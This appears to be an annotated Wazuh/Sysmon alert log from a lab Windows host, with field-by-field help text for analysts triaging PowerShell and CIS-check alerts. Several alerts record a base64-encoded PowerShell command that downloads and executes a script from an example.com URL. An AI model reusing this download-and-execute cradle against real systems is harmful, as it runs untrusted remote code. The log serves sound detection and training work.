data.win.eventdata.utcTime: 2025-04-24 22:40:02.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16112 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_n3jscojm.st0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:02.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534406.1968184 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26161 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Audit Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Audit Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable Outcome of the check: passed, failed or not applicable. Red = needs fixing; "not applicable" means the check could not be evaluated, so it is not a pass.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Audit Policy Change"' Why the check was not evaluated. Here the auditpol.exe query timed out, so the previous "passed" result has not been re-confirmed.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 100 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534407.1971685 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:04.7532925Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285708 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:04.088
ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00}
ProcessId: 15516
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00}
ParentProcessId: 16112
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:04.088 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16112 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 104 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534407.1979756 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:04.9670806Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285714 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:04.958
ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00}
ProcessId: 15516
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wykul3a2.t0d.ps1
CreationUtcTime: 2025-04-24 22:40:04.958
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:04.958 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wykul3a2.t0d.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:04.958 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 101 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534408.1982525 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:06.4519847Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285733 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:05.956
ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00}
ProcessId: 16460
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00}
ParentProcessId: 15516
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:05.956 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc5-680a-c20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16460 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 105 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534408.1990596 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:06.7153003Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285734 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:06.664
ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00}
ProcessId: 16460
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mpyc2gxe.upa.ps1
CreationUtcTime: 2025-04-24 22:40:06.664
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:06.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc5-680a-c20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16460 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
